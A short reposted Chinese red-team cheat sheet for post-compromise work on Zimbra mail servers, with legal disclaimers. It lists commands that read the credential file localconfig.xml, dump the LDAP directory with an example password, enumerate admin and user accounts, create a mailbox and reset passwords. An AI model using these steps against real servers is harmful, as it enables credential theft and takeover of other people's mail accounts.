⚠️ 免责声明:本公众号分享的技术方案仅用于合法授权的测试研究,使用者造成的一切后果与作者无关,禁止用于任何违反《网络安全法》及地方法规的行为
查看 zimbra 版本
/opt/zimbra/bin/zmcontrol -v配置文件
/opt/zimbra/conf/localconfig.xml导出 ldap database
/opt/zimbra/libexec/zmslapcat /tmp/opt/zimbra/libexec/zmslapcat -c /tmp/opt/zimbra/libexec/zmslapcat -a /tmp如果导出失败加上服务器和密码参数
/opt/zimbra/common/bin/ldapsearch -h 10.1.2.11 -x -D "uid=zimbra,cn=admins,cn=zimbra" -w 5CYhh5Rq objectclass=* >> /tmp/out.ldif-
• -h 是 ldap 服务器的 ip/域名,如果是多机器负载均衡,需要在 localconfig.xml 配置文件中找到主 ldap 服务器的 -
• -w 是 zimbra 配置文件 localconfig.xml 中的密码 zimbra_ldap_password
查看管理员邮箱
/opt/zimbra/bin/zmprov gaaa > /tmp/users_admin.txt导出所有邮箱
/opt/zimbra/bin/zmprov -l gaa > /tmp/users.txt查看邮箱大小
/opt/zimbra/bin/zmmailbox -z -m [email protected] gms添加一个邮箱
/opt/zimbra/bin/zmprov ca [email protected] test123修改密码
/opt/zimbra/bin/zmprov sp [email protected] test456原文始发于微信公众号(红队安全圈):红队内网实战 - zimbra 邮件服务渗透技巧
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论